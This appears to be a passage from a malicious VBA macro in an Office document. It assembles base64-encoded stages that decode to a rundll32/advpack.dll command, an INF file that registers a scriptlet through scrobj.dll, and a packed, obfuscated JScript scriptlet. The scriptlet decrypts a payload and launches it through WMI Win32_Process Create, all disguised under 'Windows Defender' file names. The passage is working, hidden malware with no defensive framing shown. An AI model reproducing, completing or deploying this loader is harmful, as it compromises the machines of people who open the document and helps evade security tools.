hUbq = hUbq & "MDs1MkRAMVBBLk9HLEEoLT4rLThRLC1YLzMzMjBRMi9HMT0+LypCLEBSLz06MzxRLylSMyhGMkM3L1pULFRaMlJUMipXLT1HMDU5MjpPLC1MLlRJLEBWLFouLT5UL0c0Llg5M0BLMjVQLz1ELT0/Lyo7MVApLzhGLEE1Ly5aLEA4L0FbLCxILzgvMVU2LEsyMk48MThOMzM2MDs+MzdbMThHMkRLMjAxMTJALTAwMlIwMztVLFlbLTlKLEstMUY3MDFFMk5FLzdbLkRRLTlZM0ZEMjBXLS5LMD9JLEE/MVY0LTNPLjsuMzI4Lz1XMVVVLjI4My1ZL1s0MDY9LEA+L1FWLC1aMTg/MiwxMEQ/LT4uLEBXMEU1LS5RMk44MjRRLjFALT5SLEZAMztNMEQpMlJXLykzMDE+MVE5L0JbMDo5MDFJMjo0LEVOL1ZWLko2MUJBLFBCMlJNMCxNMVooMTg8L0wuLTRQLEZFMzFZMD5bMjpaLThPMDorLT5QL1pGMUc5MDY0MThOLy86MzI/MDoyLE9BMDA+LjpWLzQqLTksMEQvMDBXLTNNLzxTLk8oMzxVLjc2Lk8uLT1XLEZGMjoyMygvLFU5LT1IMCs8LlQoMUdFMyhCMzMsM0BPMDU8MUw9LlhSLTQpLS5ZMUxAMTNHLklaMTJIL1s1LkAsLFApL1BPLEBQMykoLTRT"
hUbq = hUbq & "LFotMDBSLkpEMUIyMUIxMjBBLC0sMkg7LEUvLzQqMCw+Mk07LEsyLzkqLS8xM0U/MDUzLzkuLkEtLEFBMUEzMzxQMDFLMCs3LTlGLlhUL1pILlQoMDpRMVVaMzZYMy41LFA2LjtaMzFVMUtNLzQpMjpBMzI0MEAzMzxQLFk8MDtFMTg8MipXM0ZPMzJULlRNL1VXLFQwMTNTLkpCLTNOMEU8L1tJMlIvMy1KLjwxMTdUL1FJLkU6L1Y3My1aLFosMlJIMThILEE/MUw4MzgtL0ZXL0JSMUxBLT5WL1sxMEU6LSpALThDMzw7MzMwLTooMjlKMDVIMzMzLFU4Lzg/MitFLEo5LlQrMzguL0MyL1tLMEA+LFREM0Y6MjBSMjlMLz02MzJFMzxBLkooLFQxL1BZMzIyMEU8LTRJLE9UM0ZBM0FbLEs6Llg/Mzc9M0FOMUw3LlhJMjBTMTdUMlMvLy89MTJDLlk2MzI4M0FJL0cwLS9SLjFVLjY8LTQ/LTlbL1tAMUwyMTc8L1VbMUJFL1BJMUIpMyg8Mk4xL1tOLFAtMzI4Ljs4MVpJMDBRLzQtLkooMUFRLFUyL0IoLT4oLSpFMUsvMkg3LTQpLzNKLT4oLk5XMVY0LSo7MDUzMTNCMzdSLTksMUI7Ljs3MUFQL1E0MzFTMlI3MTMvMiwxM0FFMi9OM0ZZMy43Mlcv"
hUbq = hUbq & "LEpHMUtDMjlHLTQ9MCxFMj5ULTNOLEU1LEs+MTJJLzhJMVo7MUJBMy0sLj9TMTNBLC1IMD8+MlNELz41LFk7LEE9LEpYMzMyMk1TLSpVMyhQMVEqMipRMkQvMDE2MDA/MDFFLS9GMUI2LS5RLE9RLTQ+LFlNLlNaMTg8MzMwL1tCLT0/MUZTLS9bLE9LLFU0LCxQLTUsMUw1Lz46LTQ8LkpOMDsxLEEuLkVXLThKL0cyLz1VMkkrMDVPMUw8MjpRLTlWMlM1Mj9FMklNLk8pMkNEL0xJMDpQLEUzLEFDL0JSLzkoMzM0L0dAMzJVMCwqLThDMCw6LThbLFRBMy4tMVEwMUc7MjVMMyhPMlMvLFA0MDVPMyhLMT1FLFNXMDVSL00rMzw1MThILE9SMzZZLT5NMipRLlRCL1E2MkM7MERZMjRLMUsuLkA/LEU2LC1QMiwwLC1aMlNFMitTMTM0MERRLEA3MDVRMUJILy9FLT1NM0E5LS82LCxbMlIwMy4rLjwoMEAyM0VMLTk7MyksLE8uLEpMLTRaLy8xMVY6LFU6LE8rL1o7MlM9Lk4/MEQ/MipWL0xKMEQxMzFaMjVUMTxXMk07My4sLj9QMUE7MUcyLjFXLz0pLCxPLS9TLkVQLTNVMUZSMzxJL0dWLFkrMCwsLFQpMy1XMlcrL0dWMDA3My1YL0gtLTlPMzFY"
hUbq = hUbq & "Ly45LEorLy4zM0VDLEBOLzJbMzMwLTQ6MDE2Mj9SLFRRLT4xMUtWMThKLFA1LFRPLE9DMkk7L1paLTAvMz0pLyk9L0gsMUsrL1ZBLEorLTRPMk5HMENbMUwxLz1IMDAzMUZOMltbL0czMzxNL0c2MUctMEU9LEBTLlk8MzJWLFNXMVpRMzI8MzFVLFU8LEFKMyg/MzJILkBNM0VJL1ZFLkAxLEs8MTgoMipPMy0qLzxXMTNLLC1OLkpGMTNALkBTMjpCMD81LlM8LS5QMztLMThPMUw4MjouMzFPLk9OMUc6LTNSL1BPMy1BMVsqLT1DMygpLC0qMDoxMUY5MztHLS5TMDVSM0BQMitSM0VZLE81Lk5WLE9IL1o/MjRMMD9ALjIzMjU2LEBPLFU0LzQzLlNCMyk5MjAwL0ZUMzdRLEAzMDY+LSlTMUw4MDE/M0BQMlI3LE9MLlQoMTNCMykoL0gyLTlGMEU3MTw3LFUpLEE8LFQ8MVE6LllKMipWLzQ6Lz1CMVU8Mz0qLjFbLk5RMTxQMipULk9MMVVDMipUL0JSLThRL1YzLT1IL0M0L1tGLTAoMEArLFREMDs+MUw5LkU7MUsyL0FULz1BLSpFLS5TLT5CMk1IMCw8MzxRLS9WMDstLTNPLFQ+L1pXMzwrLyk1LFooLjwpMlguL0JKMklJMkhVLk5WMUdFMVY3"
hUbq = hUbq & "L0guLE81MDswLThLMztVMlczL1FKMT0pMUY5LTk0LkRHLEtGL0c9LEFNL0ZPLEFNMlIvMUZILS5QM0FGLEpJMDpWMUJGMjpUMDEsM0VMMTgoLEVaLllEMUtELkA0MTMxLFQoMklKMkM+LSpALz44L0MqLSlPMUw0Lz0oMUtQMkhbMykyMkg6Mz0sLFkqMyhPLThJL1ZBLT5UMUtEMUEvLlM/LC1aL0dRLTAyLTNQL0ZXLTkxL0gvMzM1MTxQLkVaLz1EMDU7LC07LFNbLz4yLjZELzksMTdBMy1KMlMzLTUpMjApLT0/L1VMMjUrMUZQMTc/LzQ4MzxTLllBLz4uLT5CMTJFLyk3M0E+LkUtMVBFLkVPL0dNLTNLMj9CLlNYLFArLjE3LjZXLk5aLlg7L1E1L1tNMERGL1ZFMyktLjs6MCxOLTQ6LzNTMCxKMlhCL0FYM0ZUMD9BLyooL0FbMDpOMDFFMzdSMk0zMThMLS87MVlbLy9ALT5SMyhbMTc9K00rMU9UMVsqMyk2LFlHMUY2MTNPMjlWMlM7LUJWMFJaMlNAMzJVMkRGMEk3Kz4oK1FQMjk0MUctMyk2M0E3MkRKMUc5LDtZLlhXMltMMUcvMThCLDcrMUdDK1I+K1FIMjk0MUctMyk2MUZTMTNQMUw0LkBNMj4+MVsrMlg7MlMxMjpQLjtbL0FSKypZ"
hUbq = hUbq & "MT1IMitRL0JSMzZNLz1ZKz4oKyo4MUc+MTNAL1FJMTNJMlMxL1ZUL0FSKypZMT1IMitRL0JSMzZNLz1ZKz4oMzs8MVpV"

    pTYH = hUbq
End Function

Function NkWV() As String
    Dim hUbq As String
hUbq = ""
hUbq = hUbq & "Yzpcd2luZG93c1xzeXN0ZW0zMlxydW5kbGwzMi5leGUgYWR2cGFjay5kbGwsTGF1bmNoSU5GU2VjdGlvbiBDOlxQcm9ncmFtRGF0"
hUbq = hUbq & "YVxXaW5kb3dzRGVmZW5kZXJUYXNrLnR4dCxEZWZlbmRlclNlcnZpY2UsMSw="

    NkWV = hUbq
End Function

Function cCIO() As String
    Dim hUbq As String
hUbq = ""
hUbq = hUbq & "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPHBhY2thZ2U+CiAgPGNvbXBvbmVudD4KICAgIDxyZWdpc3Ry"
hUbq = hUbq & "YXRpb24gcHJvZ2lkPSJ5Ij4KICAgICAgPHNjcmlwdCBsYW5ndWFnZT0iSlNjcmlwdCI+PCFbQ0RBVEFbCmV2YWwoZnVuY3Rpb24o"
hUbq = hUbq & "cCxhLGMsayxlLHIpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuKGM8YT8nJzplKHBhcnNlSW50KGMvYSkpKSsoKGM9YyVhKT4zNT9TdHJp"
hUbq = hUbq & "bmcuZnJvbUNoYXJDb2RlKGMrMjkpOmMudG9TdHJpbmcoMzYpKX07aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMt"
hUbq = hUbq & "LSlyW2UoYyldPWtbY118fGUoYyk7az1bZnVuY3Rpb24oZSl7cmV0dXJuIHJbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysn"
hUbq = hUbq & "fTtjPTF9O3doaWxlKGMtLSlpZihrW2NdKXA9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10p"
hUbq = hUbq & "O3JldHVybiBwfSgnMCBhPVtcJ1hcJyxcJ1k9XCcsXCdaLzEwLzExLzEyKzEzPT1cJ107KDIoYyxkKXswIGU9MihmKXsxNCgtLWYp"
hUbq = hUbq & "e2NbXCcxNVwnXShjW1wnMTZcJ10oKSl9fTtlKCsrZCl9KGEsMTcpKTswIGI9MihjLGQpe2M9Yy0xOzAgZT1hW2NdOzcoYltcJ0tc"
hUbq = hUbq & "J109PT04KXsoMigpezAgZj0yKCl7MCBnOzE4e2c9MTkoXCc0XFw5KDIoKVxcOVwnK1wne30uMWEoXFwxYlxcMWNcXDFkKShcXDkp"
hUbq = hUbq & "XCcrXCcpO1wnKSgpfTFlKGgpe2c9MWZ9NCBnfTswIGk9ZigpOzAgaj1cJzFnKy89XCc7aVtcJ0VcJ118fChpW1wnRVwnXT0yKGsp"
hUbq = hUbq & "ezAgbD1GKGspW1wnMWhcJ10oLz0rJC8sXCdcJyk7NSgwIG09MSxuLG8scD0xLHE9XCdcJztvPWxbXCcxaVwnXShwKyspO35vJiYo"
hUbq = hUbq & "bj1tJUw/bioxaitvOm8sbSsrJUwpP3ErPUZbXCdNXCddKDFrJm4+PigtRyptJjFsKSk6MSl7bz1qW1wnMW1cJ10obyl9NCBxfSl9"
hUbq = hUbq & "KCkpOzAgcj0yKHMsdCl7MCB1PVtdLHY9MSx3LHg9XCdcJyx5PVwnXCc7cz1FKHMpOzUoMCB6PTEsQT1zW1wnSFwnXTt6PEE7eisr"
hUbq = hUbq & "KXt5Kz1cJyVcJysoXCcxblwnK3NbXCdJXCddKHopW1wnMW9cJ10oMXApKVtcJzFxXCddKC1HKX1zPTFyKHkpOzUoMCBCPTE7Qjwz"
hUbq = hUbq & "O0IrKyl7dVtCXT1CfTUoQj0xO0I8MztCKyspe3Y9KHYrdVtCXSt0W1wnSVwnXShCJXRbXCdIXCddKSklMzt3PXVbQl07dVtCXT11"
hUbq = hUbq & "W3ZdO3Vbdl09d31CPTE7dj0xOzUoMCBDPTE7QzxzW1wnSFwnXTtDKyspe0I9KEIrTiklMzt2PSh2K3VbQl0pJTM7dz11W0JdO3Vb"
hUbq = hUbq & "Ql09dVt2XTt1W3ZdPXc7eCs9RltcJ01cJ10oc1tcJ0lcJ10oQyledVsodVtCXSt1W3ZdKSUzXSl9NCB4fTtiW1wnT1wnXT1yO2Jb"
hUbq = hUbq & "XCdKXCddPXt9O2JbXCdLXCddPSEhW119MCBEPWJbXCdKXCddW2NdOzcoRD09PTgpezcoYltcJ1BcJ109PT04KXtiW1wnUFwnXT0h"
hUbq = hUbq & "IVtdfWU9YltcJ09cJ10oZSxkKTtiW1wnSlwnXVtjXT1lfTFze2U9RH00IGV9OzAgUT1iKFwnMVwnLFwnVSkxdFwnKTswIDY9Uihc"
hUbq = hUbq & "J1M6XCcpW1wnVFwnXShiKFwnTlwnLFwnaCMhVlwnKSk7NltiKFwnR1wnLFwnMXVcJyldKCk7NltcJzF2XCddPTE7MCAxdz1SKFwn"
hUbq = hUbq & "UzpcJylbXCdUXCddKFwnMXhcJylbXCcxeVwnXShRLFwnYzpcXFdcXFdcJyw2LDF6KTsnLDYyLDk4LCd2YXJ8MHgwfGZ1bmN0aW9u"
hUbq = hUbq & "fDB4MTAwfHJldHVybnxmb3J8dzMycHN8aWZ8dW5kZWZpbmVkfHgyMHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHxhdG9i"
hUbq = hUbq & "fFN0cmluZ3wweDJ8bGVuZ3RofGNoYXJDb2RlQXR8RVREdk5MfFVOVnhQTnwweDR8ZnJvbUNoYXJDb2RlfDB4MXx1Q2Zpa0d8d3BG"
hUbq = hUbq & "V0lPfGNtfEdldE9iamVjdHx3aW5tZ210c3xHZXR8fHx4NWN8dzRyQ3FSZkNrOEszdzVqQ3VzS1d3cm9oWDBMQ2s4T0NmY0tzQU1L"
hUbq = hUbq & "YkhzSzV8ZWNLT3dwcDhEOE8yY2o3Q2lzS1VBU25Dc2xvfHc3STl3b1RDZ1Z2RG5NSzB3NUxDb3dyRGx6SjF3NWdZdzdYRG9BWERw"
hUbq = hUbq & "R1BDdW56RHZBb3J3NzR8d3FrN3c1akNtOEt5d3JvN3dyfENyY091dzdmRHR3MHJEY09yR2NPdHc3VERnc0tWd3F6RGk4S1B3NkhD"
hUbq = hUbq & "dnpBckxpRndmTU90d3JyRG5jT3pLM2JEbDhPRGRIakNtc0tQTXNPS01SN0Ruc09EWGNLenc0Rk93cEljTGs3RHZXQVV3NFZVVE1P"
hUbq = hUbq & "ZXdvckNnY09td3F3T1ZIbkRtc085d3Bsc0ZRNUN3cTdEc2NPU3dyWmh3cVhDajFjdXc3ckR0c09QSkZ2Q2dYNWd3NVpmdzZERHRj"
hUbq = hUbq & "S1FKbFBEdE1PN3c0VUl3bzNEbGNLUHc3bDF3cloxQThLaHdxdzZVWHZEcXNPUldWTENvTUs1dzduRGdNS0d3NG5DaU1PYVBjS3dX"
hUbq = hUbq & "TUt0d3BJbndwb3R3N1BEdnNLUnc2UERoeTlJR0docEJNS3x3NFI2TEdROXc2TERuY09iT01LV3c2TWxjQ3hXdzZ4THdwZ1N3cGRj"
hUbq = hUbq & "ZmozQ25HZkNuQ25EcXNLdHc3MHd3b0xEdFRVa3c1QVRMTUtLQXlMRGhSNXx3cFhEZ01LZndxM0RzY094ZGNPTFQ4S0VQMFBDalRY"
hUbq = hUbq & "Q21XM0RvTU9Pd3BKelk4T1NMc0tDWUV6RGlXekRzekRDbXNPQ1g4T2FYUU5wdzUzRHI4T2d3b3pEbWNPendyRENwMFhEc2xuRGxG"
hUbq = hUbq & "ZHh3N0Eyd29iRHNRSERsTU93dzdabkNNT0VEc096V3NLUHc2cFZ3NXpEdGl0bUU4S0VjeUp6YU1PbUhNT0JSOEtXdzdqQ3JNT1N3"
hUbq = hUbq & "NmpDdThLbHdxUkl3NmZEdWNPUEtNSzhMOE9xdzZoTmNCc1F3cUZFV1hQQ2hnfHdoaWxlfHB1c2h8c2hpZnR8MHhkN3x0cnl8RnVu"
hUbq = hUbq & "Y3Rpb258Y29uc3RydWN0b3J8eDIycmV0dXJufHgyMHRoaXN8eDIyfGNhdGNofHdpbmRvd3xBQkNERUZHSElKS0xNTk9QUVJTVFVW"
hUbq = hUbq & "V1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OXxyZXBsYWNlfGNoYXJBdHwweDQwfDB4ZmZ8MHg2fGluZGV4"
hUbq = hUbq & "T2Z8MDB8dG9TdHJpbmd8MHgxMHxzbGljZXxkZWNvZGVVUklDb21wb25lbnR8ZWxzZXxLSHxMM2ZEfFNob3dXaW5kb3d8cnRybkNv"
hUbq = hUbq & "ZGV8V2luMzJfUHJvY2Vzc3xDcmVhdGV8bnVsbCcuc3BsaXQoJ3wnKSwwLHt9KSkKCgkgIF1dPjwvc2NyaXB0PgogICAgPC9yZWdp"
hUbq = hUbq & "c3RyYXRpb24+CiAgPC9jb21wb25lbnQ+CjwvcGFja2FnZT4K"

    cCIO = hUbq
End Function

Function mPAS() As String
    Dim hUbq As String
hUbq = ""
hUbq = hUbq & "W3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKCltEZWZlbmRlclNlcnZpY2VdClVuUmVnaXN0ZXJPQ1hzPUV2ZW50TWFuYWdl"
hUbq = hUbq & "cgoKW0V2ZW50TWFuYWdlcl0KJTExJVxzY3JvYmouZGxsLE5JLGM6L3Byb2dyYW1kYXRhL1dpbmRvd3NEZWZlbmRlclRhc2sueG1s"
hUbq = hUbq & "CgpbU3RyaW5nc10KQXBwQWN0ID0gIlNPRlRXQVJFXE1pY3Jvc29mdFxDb25uZWN0aW9uIE1hbmFnZXIiClNlcnZpY2VOYW1lPSIg"
hUbq = hUbq & "IgpTaG9ydFN2Y05hbWU9IiAiCgo="

    mPAS = hUbq
End Function


Function rFdR(yQle As Integer, nsSh As Integer) As Integer
    rFdR = yQle Xor nsSh
End Function
Function oZxP(xzgy As Integer) As String
    oZxP = Chr(xzgy)
End Function
Function pdBO(xzgy As String, drSE As String) As String
    pdBO = xzgy & drSE
End Function

Public Function WDQV() As String
    Do While Len(WDQV) < 32
        If Len(WDQV) = 16 Then
            WDQV = WDQV & Hex$(8 + CInt(Rnd * 3))
        End If
        WDQV = WDQV & Hex$(CInt(Rnd * 15))
    Loop
    WDQV = "{" & Mid(WDQV, 1, 8) & "-" & Mid(WDQV, 9, 4) & "-" & Mid(WDQV, 13, 4) & "-" & Mid(WDQV, 17, 4) & "-" & Mid(WDQV, 21, 12) & "}"
End Function



Private Sub TextBox1_GotFocus()

End Sub
